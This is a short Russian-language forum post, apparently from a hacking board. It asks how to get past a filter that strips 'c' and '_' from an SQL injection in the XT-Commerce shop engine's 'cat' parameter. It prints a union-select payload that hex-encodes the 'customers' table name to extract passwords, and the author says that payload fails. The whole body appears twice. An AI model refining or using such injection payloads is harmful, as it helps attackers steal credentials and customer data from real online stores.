Star_s
22.09.2010, 21:47
Всем привет!
В движке XT-Commerce есть уязвимость - SQL-injection:
http://site.com/index.php?cat=
SQL-inj
Но, т.к. генерируемые самим движком ссылки имеют примерно такой вид:
http://site.com/index.php?cat=
с
197
http://site.com/index.php?cPath=197
_
6694
т.е. содержат символы с и _, то скрипт их вырезает. Поэтому нельзя, например сделать выборку из таблицы, в имени которой есть буква с или _.
Пробовал обойти это, заюзав переменные, вроде:
http://site.com/index.php?cat=-1+union+select+(@a:=0x637573746F6D657273),2,3,pass word+from+@a%23
0x637573746F6D657273=(customers)
Но этот номер не прокатывает.
Кто-нибудь знает, как можно обойти?
В движке XT-Commerce есть уязвимость - SQL-injection:
http://site.com/index.php?cat=
SQL-inj
Но, т.к. генерируемые самим движком ссылки имеют примерно такой вид:
http://site.com/index.php?cat=
с
197
http://site.com/index.php?cPath=197
_
6694
т.е. содержат символы с и _, то скрипт их вырезает. Поэтому нельзя, например сделать выборку из таблицы, в имени которой есть буква с или _.
Пробовал обойти это, заюзав переменные, вроде:
http://site.com/index.php?cat=-1+union+select+(@a:=0x637573746F6D657273),2,3,pass word+from+@a%23
0x637573746F6D657273=(customers)
Но этот номер не прокатывает.
Кто-нибудь знает, как можно обойти?